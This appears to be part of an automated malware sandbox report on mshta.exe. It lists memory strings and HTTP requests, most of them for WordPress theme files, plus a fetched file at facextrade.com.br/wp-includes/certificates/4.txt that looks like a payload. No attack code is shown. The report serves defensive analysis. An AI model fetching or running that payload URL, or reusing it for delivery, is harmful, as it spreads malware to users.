Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2Y
Source: mshta.exe, 00000008.00000002.1167751704.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1063601637.0000000002B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twemoji.maxcdn.com/2/wp-exclude-emoji
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://vimeo.com/:id
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://vimeo.com/channels/:channel/:id
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://vimeo.com/groups/:group/videos/:id
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://www.youtube.com/watch?v=:id
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://youtu.be/:id
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\css[1].cssJump to behavior
Source: unknownDNS traffic detected: queries for: facextrade.com.br
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/certificates/4.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/bootstrap.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: netdna.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/camera.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/responsive.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.default.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/main-style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/custom.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/pt-br.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.2.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/images/content_bg4.jpg HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/switcher.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
